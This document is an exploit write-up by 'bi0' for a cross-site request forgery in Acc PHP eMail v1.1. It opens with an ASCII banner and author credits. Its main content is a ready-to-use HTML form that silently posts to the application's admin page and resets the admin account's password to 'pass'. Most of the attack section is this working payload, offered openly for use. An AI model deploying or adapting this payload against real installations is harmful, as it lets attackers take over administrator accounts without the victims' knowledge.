view source print? ______ __ ______ /\ == \ /\ \ /\ __ \ \ \ __< \ \ \ \ \ \/\ \ \ \_____\ \ \_\ \ \_____\ \/_____/ \/_/ \/_____/ 01000010 01101001 01001111 [#]----------------------------------------------------------------[#] # # [+] Acc PHP eMail v1.1 - [ CSRF ] # # // Author Info # [x] Author: bi0 # [x] Contact: bukibv@hotmail.com # [x] Homepage : www.ssteam.ws # [x] Thanks: packetdeath,,Zer0flag,redking and ssteam.ws ... # [#]-------------------------------------------------------------------------------------------[#] # # [x] Exploit : # # [ CSRF ] # # It Changes the password # # http://localhost/mailinglist/index.php # # // Start CSRF # <html> # <form action="http://localhost/mailinglist/demo/index.php" method="POST"> # <input type="hidden" name="action" value="change"> # <input type="hidden" name="id" value="1"> # <input type="hidden" id="text" name="user" value="admin"> # <input type="password" name="password" value="pass"> # <input type="password" name="password1" value="pass"> # <input type="hidden" name="action" value="change1"> # <input type="submit" name="login" value="Modify"> # </form> # </html> # // End of attack # [#]------------------------------------------------------------------------------------------[#] #EOF